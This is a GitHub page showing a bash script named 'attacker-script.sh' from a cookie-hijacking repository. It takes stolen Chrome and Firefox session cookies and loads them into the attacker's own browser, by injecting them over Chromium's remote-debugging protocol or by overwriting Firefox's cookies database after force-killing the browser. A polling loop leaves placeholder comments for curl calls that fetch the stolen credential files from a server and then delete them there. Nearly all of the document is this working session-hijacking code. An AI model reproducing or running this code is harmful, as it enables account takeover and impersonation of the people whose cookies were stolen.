Cookie_Hijacking/attacker-script.sh at DEV · BasGame1/Cookie_Hijacking · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
#!/bin/bash
chrome_put_cookies() {
INPUT_FILE="stolen_credentials/creds"
PORT=9999
TEMP_PROFILE="./chome/stolen_cookies"
echo "[*] Launching fresh identity container..."
rm -rf "$TEMP_PROFILE"
mkdir -p "$TEMP_PROFILE"
chromium --remote-debugging-port=$PORT --user-data-dir="$TEMP_PROFILE" --remote-allow-origins="*" > /dev/null 2>&1 &
BROWSER_PID=$!

echo "[*] Waiting for browser to stabilize..."
sleep 3
python3 - <<EOF
import socket, json, os, base64, urllib.parse, urllib.request, struct, re

def call_cdp(ws_url, method, params):
    url = urllib.parse.urlparse(ws_url)
    s = socket.create_connection((url.hostname, url.port))
    s.settimeout(5)

    key = base64.b64encode(os.urandom(16)).decode()
    handshake = (f"GET {url.path} HTTP/1.1\r\nHost: {url.netloc}\r\nUpgrade: websocket\r\nConnection: Upgrade\r\nSec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n")
    s.send(handshake.encode())
    s.recv(4096)

    msg = json.dumps({"id": 1, "method": method, "params": params}).encode()
    header = bytearray([0x81, 0x80 | (len(msg) if len(msg) <= 125 else 126)])
    if len(msg) > 125: header += struct.pack(">H", len(msg))
    mask = os.urandom(4)
    s.send(header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(msg)))
    res = s.recv(65535)
    s.close()
    return res

try:
    cookies = []
    current_cookie = {}

    if not os.path.exists("$INPUT_FILE"):
        print("[-] Error: $INPUT_FILE not found.")
        exit(1)

    with open("$INPUT_FILE", "r") as f:
        for line in f:
            if "DOMAIN:" in line: current_cookie['domain'] = line.split("DOMAIN:")[1].strip()
            if "NAME:" in line: current_cookie['name'] = line.split("NAME:")[1].strip()
            if "VALUE:" in line:
                current_cookie['value'] = line.split("VALUE:")[1].strip()
                cookies.append(current_cookie)
                current_cookie = {}
    info = urllib.request.urlopen("http://localhost:$PORT/json").read()
    ws_url = json.loads(info)[0]['webSocketDebuggerUrl']
    print(f"[*] Teleporting {len(cookies)} identity tokens...")
    for c in cookies:
        # Construct the URL required for injection
        clean_domain = c['domain'].lstrip('.')
        url = f"https://{clean_domain}/"

        params = {
            "url": url,
            "name": c['name'],
            "value": c['value'],
            "domain": c['domain'],
            "path": "/",
            "secure": True,
            "sameSite": "Lax"
        }
        call_cdp(ws_url, "Network.setCookie", params)

    print("[+] Teleportation successful.")

except Exception as e:
    print(f"[-] Critical Error: {e}")
EOF

echo -e "\e[32m[!] IDENTITY LOADED.\e[0m"
echo "[*] You can now use the Chromium window that opened."
echo "[*] Press Ctrl+C here to close the session and wipe the traces."
wait $BROWSER_PID
}
firefox_put_cookies() {
    python3 - << EOF
import sqlite3
import os
import subprocess
import time
SOURCE_DB = "stolen_credentials/firefox.sqlite"

def get_profile_dir():
    paths = [os.path.expanduser("~/.config/mozilla/firefox"), os.path.expanduser("~/.mozilla/firefox")]
    for p in paths:
        if os.path.exists(p):
            # Find the active profile
            res = subprocess.getoutput(f"find {p} -name 'cookies.sqlite' | head -n 1")
            if res: return os.path.dirname(res)
    return None

def teleport_cookies():
    dest_profile = get_profile_dir()
    if not dest_profile:
        print("[-] Error: Local Firefox profile not found.")
        return

    dest_db = os.path.join(dest_profile, "cookies.sqlite")
    print(f"[*] Destination: {dest_db}")
    print(f"[*] Source:      {SOURCE_DB}")

    if not os.path.exists(SOURCE_DB):
        print(f"[-] Error: Source file {SOURCE_DB} missing.")
        return

    try:
        print("[!] Terminating Firefox for identity swap...")
        os.system("pkill -9 firefox")
        time.sleep(2)
        src_conn = sqlite3.connect(SOURCE_DB)
        dst_conn = sqlite3.connect(dest_db)

        src_cursor = src_conn.cursor()
        dst_cursor = dst_conn.cursor()
        src_cursor.execute("SELECT host, name, value, path, expiry, isSecure, isHttpOnly FROM moz_cookies")
        cookies = src_cursor.fetchall()
        print(f"[*] Siphoning {len(cookies)} rows from the stolen database...")
        now = int(time.time() * 1000000)
        for c in cookies:
            dst_cursor.execute("""
                INSERT OR REPLACE INTO moz_cookies
                (host, name, value, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly)
                VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
            """, (c[0], c[1], c[2], c[3], c[4], now, now, c[5], c[6]))

        dst_conn.commit()
        src_conn.close()
        dst_conn.close()
        print(f"[+] Success! {len(cookies)} identity markers transplanted.")

    except Exception as e:
        print(f"[-] Surgery failed: {e}")

if __name__ == "__main__":
    teleport_cookies()
    print("[*] Reopening Firefox with new identity...")
    os.system("firefox > /dev/null 2>&1 &")
EOF
}
if [ -f stolen_credentials/firefox.sqlite ]; then
 firefox_put_cookies
 exit
elif [ -f stolen/credentials/creds ]; then
 chrome_put_cookies
 exit
fi
mkdir -p stolen_credentials
while true; do
 echo "Curling chrome creds"
 # Add curl to the server where the creds file its located
 echo "Curling chrome info"
 # Add curl to the server where the info file its located
 echo "Curling chrome key"
 # Add curl to the server where the key its located


 echo "Curling firefox sqlite database"
 # Add curl to the server where the database its located
 echo "Curling firefox key"
 # Add curl to the server where the key its located
 echo "Curling firefox info"
 # Add curl to the server where the info file its located
 if [ -s creds ]; then
  mv creds stolen_credentials
  mv info stolen_credentials
  mv key stolen_credentials
  echo "Deleting credentials on the server"
  # Optional, if you dont want the credentials to be on the server
  chrome_put_cookies
  break
 elif [ -f firefoxsqlite ]; then
  mv firefoxsqlite firefox.sqlite
  mv firefox.sqlite stolen_credentials
  mv info stolen_credentials
  mv key stolen_credentials
  echo "Deleting credentials on the server"
  # Optional, if you dont want the credentials to be on the server
  firefox_put_cookies
  break
 else
  rm creds
  rm info
  rm firefoxsqlite
  rm key
 fi
clear
sleep 5
done